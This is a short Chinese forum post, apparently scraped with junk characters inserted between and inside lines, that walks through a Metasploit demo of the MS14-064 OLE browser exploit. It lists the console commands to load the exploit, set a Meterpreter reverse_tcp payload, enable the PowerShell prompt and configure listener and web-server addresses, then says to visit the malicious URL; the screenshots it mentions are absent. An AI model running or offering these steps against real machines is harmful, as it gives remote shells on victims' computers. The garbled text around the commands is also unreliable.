- ]" R4 D! k ^' m' ~
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
8 q9 ^, E3 ?) A. ?) Q
: Z- B; i, @$ s) J
7 q' a! b; |0 q 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 g; ~% Z0 J; h; v; o# ?4 O
8 I7 z. k5 H4 h. d8 ~- e& m- F
+ t7 ? m/ N! [
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% p3 t3 |4 ~% m: K- I7 q% h; u/ s
0 a, ?8 k1 A& j4 P8 t: E$ K& k
4 C. N- U3 x/ d6 `
set AllowPowershellPrompt true: a+ G9 g( b( w. W5 j
: y- @* h- P4 A0 r
* V$ t/ e3 u. ]) z I% n8 [
Set LHOST 192.168.0.1097 t! |7 Y, F/ j) G j2 Q5 b
2 h" d: ~% r* u' N& A
9 G! y3 U4 A$ c set SRVHOST 192.168.0.1092 p* d8 @" e8 }9 ?& g9 d! @0 x
: S+ _. J) s+ w% [8 s$ P4 v$ _/ Y! b- m8 U3 `% A2 o
Set uripath share! L4 ~% b/ _/ O9 s1 g
/ A% ]/ L4 S: X! w* u! k8 B
& d* g) p* b1 G! a Set srvport 80
- y% T" j1 {, `- X
6 X# z: g* _: @- D& G: ~8 T8 y
+ ~# K* c; t. l7 `7 O
4 H" B9 L0 y7 k/ d5 ]* }$ F
7 `# s5 v% x, b* Z# V) b' }
, ]1 H' r( |# u7 J' \
) G7 v+ F/ b1 I3 j$ K
& L5 h6 z8 f+ b3 I: V4 c9 m6 m% ^) Y! h, E) }- g4 m* e) W& Y4 \7 i- `
6 [; x. Q1 o3 E4 T n
& X% l! p- @) q6 B" N3 k
$ H4 g. n; T3 w# Q 9 p7 R0 L9 W5 \+ M6 i
" K9 P% B( j8 f4 {; C& R# x
/ ~* s; B! l. M! m: I) {1 j% ` , t0 i. t3 `, y, |& j
8 ]! m7 C4 g; Q0 s9 b
2 Q5 V" o0 R8 q/ g 下面我们来访问本地地址如图:
% k- `0 [: d" |# r8 `
. ~7 a1 M R- q
' N) \2 o. a) W% ?) Z+ ]* u
9 P# F0 C7 K- J" J7 E
9 e! ~0 v" y& l4 G4 X8 s' v( I( d; C& D/ B. A E5 E
6 w& S1 g1 G4 l( v% _1 l6 d
; S; v) i5 Y2 R7 i- b$ v _; x( Z2 D- c5 c, K4 G) y" }1 w
3 x1 s$ X1 k3 x6 M/ J